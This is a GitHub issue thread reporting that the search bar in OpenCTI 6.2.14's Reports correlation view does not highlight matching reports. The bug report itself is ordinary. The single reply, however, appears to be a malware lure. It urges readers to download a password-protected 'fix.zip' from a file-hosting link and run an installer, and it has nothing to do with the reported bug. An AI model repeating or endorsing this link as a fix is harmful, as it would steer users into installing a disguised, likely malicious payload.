### ISSUE TITLE
Search in "Correlation view" is not working

### ISSUE THREAD

**Issue by Lhorus6** [LuatixHQ/opencti#8162]
## Description

The correlation knowledge graph search bar does not work. Entering a keyword does not highlight the corresponding report(s) (nothing happens).

## Environment

OCTI 6.2.14

## Reproducible Steps

Steps to create the smallest reproducible scenario:
1. Go to Reports > Knowledge > Correlation view
2. Type in a search word
3. Highlighting in a node graph is expected but it does not happen.

![Screenshot 2024-08-26 085020](https://github.com/user-attachments/assets/6d7c3113-ab75-4509-b3c6-3431409a5556)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
